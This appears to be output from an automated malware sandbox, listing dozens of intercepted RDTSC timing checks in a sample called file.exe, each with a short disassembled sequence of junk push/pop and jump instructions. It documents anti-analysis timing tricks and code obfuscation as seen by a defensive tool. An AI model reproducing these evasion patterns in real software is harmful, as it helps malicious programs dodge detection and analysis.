Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFF5D1 second address: FFF646 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2F74519258h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnl 00007F2F74519260h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F2F74519258h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e jmp 00007F2F74519261h 0x00000033 lea eax, dword ptr [ebp+1248FF94h] 0x00000039 mov di, 0956h 0x0000003d movzx edx, cx 0x00000040 nop 0x00000041 ja 00007F2F74519264h 0x00000047 push eax 0x00000048 push esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035E66 second address: 1035E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F2F74D59301h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1035E7E second address: 1035E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2F74519256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103C09D second address: 103C0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103B056 second address: 103B065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2F74519256h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103B359 second address: 103B35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103B35D second address: 103B367 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F74519256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103B96F second address: 103B975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103B975 second address: 103B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103B97F second address: 103B985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103BAC6 second address: 103BACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103BACC second address: 103BAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103BDF5 second address: 103BDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103BDFB second address: 103BDFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10413D8 second address: 10413DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10413DC second address: 1041412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2F74D592FEh 0x0000000c jl 00007F2F74D5930Ah 0x00000012 jc 00007F2F74D592F6h 0x00000018 jmp 00007F2F74D592FEh 0x0000001d js 00007F2F74D59302h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1041412 second address: 1041418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1041418 second address: 1041422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1041422 second address: 1041427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1041427 second address: 104144B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2F74D59302h 0x0000000d jmp 00007F2F74D592FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1048242 second address: 1048246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1048246 second address: 104825F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F74D59303h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104825F second address: 1048270 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2F74519258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1048270 second address: 1048274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1048274 second address: 104827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1046E78 second address: 1046E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2F74D592F6h 0x0000000a jmp 00007F2F74D59304h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1046FF8 second address: 1046FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1046FFD second address: 104702B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F2F74D59307h 0x0000000a jmp 00007F2F74D592FDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104717C second address: 104718D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jne 00007F2F74519256h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104718D second address: 10471BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 ja 00007F2F74D592FCh 0x0000000e ja 00007F2F74D592F6h 0x00000014 jmp 00007F2F74D59302h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d jns 00007F2F74D592F6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C1BC second address: 104C1DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2F74519256h 0x0000000a jmp 00007F2F74519268h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C1DE second address: 104C1F0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C38E second address: 104C392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C392 second address: 104C39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F2F74D592F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C66B second address: 104C682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F74519263h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C682 second address: 104C686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104C686 second address: 104C6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2F74519266h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CA53 second address: 104CA6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2F74D592FAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F2F74D592F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CA6B second address: 104CA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CA6F second address: 104CA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CA75 second address: 104CA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CA7F second address: 104CA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050129 second address: 1050143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2F7451925Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050143 second address: 1050147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050147 second address: 1050169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2F7451925Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F7451925Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050169 second address: 105016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105016D second address: 1050173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104F875 second address: 104F8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F2F74D59300h 0x0000000c jmp 00007F2F74D59307h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10586B4 second address: 10586D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2F74519269h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105660F second address: 1056613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1056613 second address: 1056624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F7451925Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10568B3 second address: 10568C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2F74D592F6h 0x0000000a jbe 00007F2F74D592F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10568C3 second address: 10568C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10568C7 second address: 10568FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F74D59301h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 push esi 0x00000014 jmp 00007F2F74D59304h 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10574EE second address: 1057502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F2F74519268h 0x0000000d push ebx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ebx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1057502 second address: 1057508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105779D second address: 10577AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2F74519256h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10577AD second address: 10577B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1059E47 second address: 1059E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F74519264h 0x00000009 jnl 00007F2F74519256h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1059E67 second address: 1059E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F2F74D59300h 0x00000016 pop edi 0x00000017 pushad 0x00000018 jmp 00007F2F74D592FFh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1059E9B second address: 1059EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D1AF second address: 105D1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105D876 second address: 105D8A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F7451925Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2F74519269h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105DA0C second address: 105DA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2F74D592F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105DA16 second address: 105DA23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F2F74519256h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1062B26 second address: 1062B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1062B2C second address: 1062B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106BD39 second address: 106BD57 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F2F74D592F6h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F2F74D592FAh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106BD57 second address: 106BD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007F2F74519256h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106BD63 second address: 106BD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106BFDE second address: 106BFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106BFE2 second address: 106BFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2F74D592FEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106BFFA second address: 106C006 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2F74519256h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C006 second address: 106C051 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D592FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2F74D59304h 0x00000010 pushad 0x00000011 jmp 00007F2F74D59307h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F2F74D592FBh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C051 second address: 106C05A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C1B5 second address: 106C1D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F2F74D592F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F2F74D592FFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C48E second address: 106C494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C9C4 second address: 106C9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10735F7 second address: 10735FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10735FB second address: 1073601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1073601 second address: 1073607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1073607 second address: 1073612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2F74D592F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9756 second address: FB9762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F2F74519256h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10731C0 second address: 10731C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10731C4 second address: 10731E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F2F74519264h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10812BC second address: 10812C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080E49 second address: 1080E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080E4D second address: 1080E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080E51 second address: 1080E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2F74519264h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080E6F second address: 1080E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1080E73 second address: 1080E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1083C7F second address: 1083C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108D32B second address: 108D341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2F74519256h 0x0000000a jmp 00007F2F7451925Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108D341 second address: 108D371 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2F74D592FCh 0x00000008 js 00007F2F74D592F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F2F74D592F6h 0x00000019 jmp 00007F2F74D59307h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097437 second address: 1097448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F2F74519256h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10972DA second address: 10972EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F74D592FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109D5A8 second address: 109D5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109D5AE second address: 109D5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109D70D second address: 109D71F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F2F7451925Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109D71F second address: 109D725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
